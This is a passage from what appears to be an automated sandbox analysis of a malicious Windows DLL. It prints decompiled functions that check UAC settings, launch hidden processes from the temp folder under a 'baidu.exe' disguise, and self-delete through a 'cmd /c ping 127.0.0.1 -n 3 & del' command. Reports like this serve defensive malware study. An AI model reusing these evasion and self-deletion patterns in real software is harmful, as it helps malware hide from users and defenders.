				E1000CF80(__edi,  &_v819, 0, 0x103);
				_v548 = 0;
				_t58 =  &_v547;
				E1000CF80(_t68,  &_v547, 0, 0x103);
				_t65 =  &(_v284.dwMajorVersion);
				E1000CF80(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
				_t74 = _t71 + 0x24;
				_v284.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v284);
				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D2A0() == 0) {
					_t38 = E1001D840(_t68,  &_v548); // executed
					_t75 = _t74 + 4;
					__eflags = _t38;
					if(_t38 != 0) {
						L11:
						E1001D330(_t58,  &_v548);
						_t65 =  &_v820;
						_t41 = E1001CD50( &_v820, 0x104,  &_v824);
						_t77 = _t75 + 0x10;
						__eflags = _t41;
						if(_t41 >= 0) {
							_t65 = 0x104 - _v824;
							__eflags = 0x104;
							E1001CCB0( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
							_t77 = _t77 + 0xc;
						}
						goto L13;
					}
					_t49 = E1001D5C0(_t68,  &_v548); // executed
					_t75 = _t75 + 4;
					__eflags = _t49;
					if(_t49 != 0) {
						goto L11;
					}
					_t58 =  &_v548;
					_t50 = E1001DAD0(_t68,  &_v548); // executed
					_t75 = _t75 + 4;
					__eflags = _t50;
					if(_t50 != 0) {
						goto L11;
					}
					_t65 =  &_v548;
					_t51 = E1001D3D0(_t57, _t68, _t69,  &_v548);
					_t77 = _t75 + 4;
					__eflags = _t51;
					if(_t51 == 0) {
						goto L13;
					}
					goto L11;
				} else {
					_t53 = E1001DAD0(_t68,  &_v548);
					_t77 = _t74 + 4;
					_t84 = _t53;
					if(_t53 != 0) {
						_t65 =  &_v548;
						E1001D330( &_v548,  &_v548);
						E1001D380(_t84,  &_v820,  &_v548);
						_t77 = _t77 + 0xc;
					}
					L13:
					if(_v820 == 0) {
						_t65 =  &_v820;
						E1001D000("Mid2Failed", 0x104,  &_v820);
						_t77 = _t77 + 0xc;
					}
					return E1000D903(_t65, _a4, 0x104,  &_v820);
				}
			}























                                                                                                                                                                  0x1001dc60
                                                                                                                                                                  0x1001dc60
                                                                                                                                                                  0x1001dc60
                                                                                                                                                                  0x1001dc6d
                                                                                                                                                                  0x1001de14
                                                                                                                                                                  0x1001de14
                                                                                                                                                                  0x1001dc73
                                                                                                                                                                  0x1001dc88
                                                                                                                                                                  0x1001dc90
                                                                                                                                                                  0x1001dc9e
                                                                                                                                                                  0x1001dca5
                                                                                                                                                                  0x1001dcb4
                                                                                                                                                                  0x1001dcbb
                                                                                                                                                                  0x1001dcc0
                                                                                                                                                                  0x1001dcc3
                                                                                                                                                                  0x1001dcd4
                                                                                                                                                                  0x1001dce1
                                                                                                                                                                  0x1001dd39
                                                                                                                                                                  0x1001dd3e
                                                                                                                                                                  0x1001dd41
                                                                                                                                                                  0x1001dd43
                                                                                                                                                                  0x1001dd7e
                                                                                                                                                                  0x1001dd85
                                                                                                                                                                  0x1001dd99
                                                                                                                                                                  0x1001dda0
                                                                                                                                                                  0x1001dda5
                                                                                                                                                                  0x1001dda8
                                                                                                                                                                  0x1001ddaa
                                                                                                                                                                  0x1001ddbf
                                                                                                                                                                  0x1001ddbf
                                                                                                                                                                  0x1001ddcd
                                                                                                                                                                  0x1001ddd2
                                                                                                                                                                  0x1001ddd2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ddaa
                                                                                                                                                                  0x1001dd4c
                                                                                                                                                                  0x1001dd51
                                                                                                                                                                  0x1001dd54
                                                                                                                                                                  0x1001dd56
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dd58
                                                                                                                                                                  0x1001dd5f
                                                                                                                                                                  0x1001dd64
                                                                                                                                                                  0x1001dd67
                                                                                                                                                                  0x1001dd69
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dd6b
                                                                                                                                                                  0x1001dd72
                                                                                                                                                                  0x1001dd77
                                                                                                                                                                  0x1001dd7a
                                                                                                                                                                  0x1001dd7c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dcf5
                                                                                                                                                                  0x1001dcfc
                                                                                                                                                                  0x1001dd01
                                                                                                                                                                  0x1001dd04
                                                                                                                                                                  0x1001dd06
                                                                                                                                                                  0x1001dd08
                                                                                                                                                                  0x1001dd0f
                                                                                                                                                                  0x1001dd25
                                                                                                                                                                  0x1001dd2a
                                                                                                                                                                  0x1001dd2a
                                                                                                                                                                  0x1001ddd5
                                                                                                                                                                  0x1001ddde
                                                                                                                                                                  0x1001dde0
                                                                                                                                                                  0x1001ddf1
                                                                                                                                                                  0x1001ddf6
                                                                                                                                                                  0x1001ddf6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001de0e

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DC88
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DCA5
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DCBB
                                                                                                                                                                  • GetVersionExW.KERNEL32(00000114), ref: 1001DCD4
                                                                                                                                                                  • _strcpy_s.LIBCMT ref: 1001DE09
                                                                                                                                                                    • Part of subcall function 1001D2A0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D2DE
                                                                                                                                                                    • Part of subcall function 1001D2A0: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D2FF
                                                                                                                                                                    • Part of subcall function 1001D2A0: RegCloseKey.ADVAPI32(00000000), ref: 1001D319
                                                                                                                                                                    • Part of subcall function 1001DAD0: wsprintfW.USER32 ref: 1001DB1C
                                                                                                                                                                    • Part of subcall function 1001DAD0: CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DB38
                                                                                                                                                                    • Part of subcall function 1001DAD0: _memset.LIBCMT ref: 1001DB81
                                                                                                                                                                    • Part of subcall function 1001DAD0: DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DBB0
                                                                                                                                                                    • Part of subcall function 1001DAD0: _memset.LIBCMT ref: 1001DBC8
                                                                                                                                                                    • Part of subcall function 1001DAD0: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DC14
                                                                                                                                                                    • Part of subcall function 1001D330: _strlen.LIBCMT ref: 1001D33E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$Close$ChangeControlCreateDeviceFileFindNotificationOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                                  • String ID: Mid2Failed
                                                                                                                                                                  • API String ID: 3782552391-1001836097
                                                                                                                                                                  • Opcode ID: 50a3f8e2d068991e8892df41f2044601be28d6eee11f225b6220172d6ff4ea3d
                                                                                                                                                                  • Instruction ID: 1ac3354d9508f96bf62ada26ae39cff1003ebfb3b345a0bbc8a583754ab99eb2
                                                                                                                                                                  • Opcode Fuzzy Hash: 50a3f8e2d068991e8892df41f2044601be28d6eee11f225b6220172d6ff4ea3d
                                                                                                                                                                  • Instruction Fuzzy Hash: 794142F5D0021967DB14F7A0AD86FEA7378EB14744F4405A9EA0899042FA70FBC8CA92
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001FF30, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E1001FF30(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E100231AF);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF80(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF80(_t41,  &_v311, 0, 0x103);
				E1001A660(__ebx, _t41, __esi, _t50,  &_v44); // executed
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push("0011");
				_push(E100011E0( &_v44));
				E1000CCA3(_t41,  &_v312, "%s%s %s %s",  &_v576);
				E1001A230(_t50,  &_v312); // executed
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                                  0x1001ff30
                                                                                                                                                                  0x1001ff30
                                                                                                                                                                  0x1001ff33
                                                                                                                                                                  0x1001ff35
                                                                                                                                                                  0x1001ff40
                                                                                                                                                                  0x1001ff41
                                                                                                                                                                  0x1001ff4e
                                                                                                                                                                  0x1001ff55
                                                                                                                                                                  0x1001ff6a
                                                                                                                                                                  0x1001ff72
                                                                                                                                                                  0x1001ff87
                                                                                                                                                                  0x1001ff93
                                                                                                                                                                  0x1001ffa7
                                                                                                                                                                  0x1001ffb5
                                                                                                                                                                  0x1001ffb6
                                                                                                                                                                  0x1001ffc3
                                                                                                                                                                  0x1001ffd7
                                                                                                                                                                  0x1001ffe6
                                                                                                                                                                  0x1001fff1
                                                                                                                                                                  0x1001fff6
                                                                                                                                                                  0x10020000
                                                                                                                                                                  0x10020008
                                                                                                                                                                  0x10020012

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FF6A
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FF87
                                                                                                                                                                    • Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                    • Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FFA7
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FFD7
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
                                                                                                                                                                    • Part of subcall function 1001A230: CreateProcessA.KERNELBASE ref: 1001A28B
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                                  • String ID: %s%s %s %s$0011
                                                                                                                                                                  • API String ID: 3552933064-2132516514
                                                                                                                                                                  • Opcode ID: 0eb73ee6c93d5a7fbacfd3e3e97f4934b28a9b2ee00772137007c28218f8aa32
                                                                                                                                                                  • Instruction ID: 9f394a8bc38bf25989e99c3c3c429d993db3441894fbff9673ae28f0a4b17f98
                                                                                                                                                                  • Opcode Fuzzy Hash: 0eb73ee6c93d5a7fbacfd3e3e97f4934b28a9b2ee00772137007c28218f8aa32
                                                                                                                                                                  • Instruction Fuzzy Hash: 8D11C8B6C00208ABEB14EBA0DC46FDD777CEB04750F4441A4F619A61C1EB787749CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A230, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A230(void* __eflags, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				CHAR* _v24;
				struct _STARTUPINFOA _v100;
				int _t18;
				void* _t27;

				_v24 = 0;
				E1000CF80(_t27,  &_v100, 0, 0x44);
				_v100.cb = 0x44;
				_v100.dwFlags = 1;
				_v100.wShowWindow = 0;
				E1000CF80(_t27,  &_v20, 0, 0x10);
				_t18 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20); // executed
				if(_t18 != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					_v24 = 1;
				}
				return _v24;
			}








                                                                                                                                                                  0x1001a236
                                                                                                                                                                  0x1001a245
                                                                                                                                                                  0x1001a24d
                                                                                                                                                                  0x1001a254
                                                                                                                                                                  0x1001a25b
                                                                                                                                                                  0x1001a269
                                                                                                                                                                  0x1001a28b
                                                                                                                                                                  0x1001a293
                                                                                                                                                                  0x1001a299
                                                                                                                                                                  0x1001a2a3
                                                                                                                                                                  0x1001a2a9
                                                                                                                                                                  0x1001a2a9
                                                                                                                                                                  0x1001a2b6

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle_memset$CreateProcess
                                                                                                                                                                  • String ID: D
                                                                                                                                                                  • API String ID: 1151464618-2746444292
                                                                                                                                                                  • Opcode ID: 7c2c5d68370ad68bcc3924ed5fcca5d5250c0e9b0e6499568d8da0f56ceb1a45
                                                                                                                                                                  • Instruction ID: 109a0bc55e8301458d6397c35f4bc98ddca4d2c3873fb5e4ea0d57c84511a1e7
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c2c5d68370ad68bcc3924ed5fcca5d5250c0e9b0e6499568d8da0f56ceb1a45
                                                                                                                                                                  • Instruction Fuzzy Hash: 1601E1B590431DABEB00DBD0DC89FEE7779FB44704F140518FA04AB281DBB5A958CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A2C0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A2C0() {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				int _t15;
				void* _t20;

				_v532 = 0;
				E1000CF80(_t20,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF80(_t20,  &_v267, 0, 0x103);
				GetModuleFileNameA(0,  &_v532, 0x104);
				E1000CCA3(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
				_t15 = WinExec( &_v268, 0); // executed
				return _t15;
			}









                                                                                                                                                                  0x1001a2c9
                                                                                                                                                                  0x1001a2de
                                                                                                                                                                  0x1001a2e6
                                                                                                                                                                  0x1001a2fb
                                                                                                                                                                  0x1001a311
                                                                                                                                                                  0x1001a32a
                                                                                                                                                                  0x1001a33b
                                                                                                                                                                  0x1001a344

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A31E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                                  • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                                  • API String ID: 2874319085-10483710
                                                                                                                                                                  • Opcode ID: f420551fc850474c97d40147a8eae288538b5e405040515d23e53dac240480c4
                                                                                                                                                                  • Instruction ID: dfe06c4bab66860014fe570f5f0bb2c2abbb8c4bd71063b777625ae051172b46
                                                                                                                                                                  • Opcode Fuzzy Hash: f420551fc850474c97d40147a8eae288538b5e405040515d23e53dac240480c4
                                                                                                                                                                  • Instruction Fuzzy Hash: A9F04F7998431C66E720D760EC8AFE9773CAB24704F4405D4F6986A1C5EEF467CC8BA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A660, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E1001A660(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v52;
				char _v53;
				short _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v72;
				char _v335;
				char _v336;
				signed int _v340;
				void* __ebp;
				intOrPtr _t40;
				void* _t45;
				intOrPtr _t73;

				_t80 = __eflags;
				_t71 = __edi;
				_push(0xffffffff);
				_push(E1002315C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v340 = 0;
				E10001160( &_v52, __eflags, 0x10025ca1);
				_v8 = 0;
				_v336 = 0;
				E1000CF80(__edi,  &_v335, 0, 0x103);
				GetModuleFileNameA(0,  &_v336, 0x104);
				_t40 = E1001A1D0( &_v336); // executed
				_v24 = _t40;
				_v72 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v53 = 0;
				E1000CCA3(_t71,  &_v72, "%d", _v24);
				_v20 = E1001A4E0(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
				_t81 = _v20;
				if(_v20 != 0) {
					E10001AB0( &_v52, _t81, _v20);
					E10001AB0( &_v52, _t81, ".exe");
					_push(_v20);
					E1000CA40(__ebx, _t71, __esi, _t81);
				}
				_t45 = E10001200( &_v52);
				_t82 = _t45;
				if(_t45 == 0) {
					E10001AB0( &_v52, _t82, "baidu.exe");
				}
				E10001110(_a4, _t82,  &_v52);
				_v340 = _v340 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v52);
				 *[fs:0x0] = _v16;
				return _a4;
			}






















                                                                                                                                                                  0x1001a660
                                                                                                                                                                  0x1001a660
                                                                                                                                                                  0x1001a663
                                                                                                                                                                  0x1001a665
                                                                                                                                                                  0x1001a670
                                                                                                                                                                  0x1001a671
                                                                                                                                                                  0x1001a67e
                                                                                                                                                                  0x1001a690
                                                                                                                                                                  0x1001a695
                                                                                                                                                                  0x1001a69c
                                                                                                                                                                  0x1001a6b1
                                                                                                                                                                  0x1001a6c7
                                                                                                                                                                  0x1001a6d4
                                                                                                                                                                  0x1001a6dc
                                                                                                                                                                  0x1001a6df
                                                                                                                                                                  0x1001a6e5
                                                                                                                                                                  0x1001a6e8
                                                                                                                                                                  0x1001a6eb
                                                                                                                                                                  0x1001a6ee
                                                                                                                                                                  0x1001a6f1
                                                                                                                                                                  0x1001a6f5
                                                                                                                                                                  0x1001a705
                                                                                                                                                                  0x1001a719
                                                                                                                                                                  0x1001a71c
                                                                                                                                                                  0x1001a720
                                                                                                                                                                  0x1001a729
                                                                                                                                                                  0x1001a736
                                                                                                                                                                  0x1001a73e
                                                                                                                                                                  0x1001a73f
                                                                                                                                                                  0x1001a744
                                                                                                                                                                  0x1001a74a
                                                                                                                                                                  0x1001a74f
                                                                                                                                                                  0x1001a751
                                                                                                                                                                  0x1001a75b
                                                                                                                                                                  0x1001a75b
                                                                                                                                                                  0x1001a767
                                                                                                                                                                  0x1001a775
                                                                                                                                                                  0x1001a77b
                                                                                                                                                                  0x1001a785
                                                                                                                                                                  0x1001a790
                                                                                                                                                                  0x1001a79a

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A1D0: FindFirstFileA.KERNELBASE(1001A6D9,?), ref: 1001A1EE
                                                                                                                                                                    • Part of subcall function 1001A1D0: FindClose.KERNELBASE(000000FF), ref: 1001A216
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
                                                                                                                                                                    • Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID: .exe$baidu.exe
                                                                                                                                                                  • API String ID: 3164538923-2273953317
                                                                                                                                                                  • Opcode ID: 55ab466b0c901d54146a493d2a8252fd219c79ef87a46662c8a6c115446429cf
                                                                                                                                                                  • Instruction ID: e55bd592b59adb37ad85060a3931d0354643b17087754827cff962c307c3447c
                                                                                                                                                                  • Opcode Fuzzy Hash: 55ab466b0c901d54146a493d2a8252fd219c79ef87a46662c8a6c115446429cf
                                                                                                                                                                  • Instruction Fuzzy Hash: 56315BB5C10258ABEB04DBA0ED85FEEB7B4FF09740F400169F519A6281EB746A48CB91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001FE50, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                  			E1001FE50(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E1002319D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF80(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF80(_t41,  &_v311, 0, 0x103);
				E1001A660(__ebx, _t41, __esi, _t50,  &_v44); // executed
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push(E100011E0( &_v44));
				E1000CCA3(_t41,  &_v312, "%s%s 200 %s",  &_v576);
				E1001A230(_t50,  &_v312); // executed
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                                  0x1001fe50
                                                                                                                                                                  0x1001fe50
                                                                                                                                                                  0x1001fe53
                                                                                                                                                                  0x1001fe55
                                                                                                                                                                  0x1001fe60
                                                                                                                                                                  0x1001fe61
                                                                                                                                                                  0x1001fe6e
                                                                                                                                                                  0x1001fe75
                                                                                                                                                                  0x1001fe8a
                                                                                                                                                                  0x1001fe92
                                                                                                                                                                  0x1001fea7
                                                                                                                                                                  0x1001feb3
                                                                                                                                                                  0x1001fec7
                                                                                                                                                                  0x1001fed5
                                                                                                                                                                  0x1001fede
                                                                                                                                                                  0x1001fef2
                                                                                                                                                                  0x1001ff01
                                                                                                                                                                  0x1001ff0c
                                                                                                                                                                  0x1001ff11
                                                                                                                                                                  0x1001ff1b
                                                                                                                                                                  0x1001ff23
                                                                                                                                                                  0x1001ff2d

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FE8A
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FEA7
                                                                                                                                                                    • Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                    • Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FEC7
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FEF2
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
                                                                                                                                                                    • Part of subcall function 1001A230: CreateProcessA.KERNELBASE ref: 1001A28B
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                                  • String ID: %s%s 200 %s
                                                                                                                                                                  • API String ID: 3552933064-2772210913
                                                                                                                                                                  • Opcode ID: c5a6d00ce3aa5ea66f22295ded407cf218970161439a2ab676f88754d585d496
                                                                                                                                                                  • Instruction ID: fca78508d4ffe10e775a72f73cdab82aabd77a27c247e381faabbd00212866fc
                                                                                                                                                                  • Opcode Fuzzy Hash: c5a6d00ce3aa5ea66f22295ded407cf218970161439a2ab676f88754d585d496
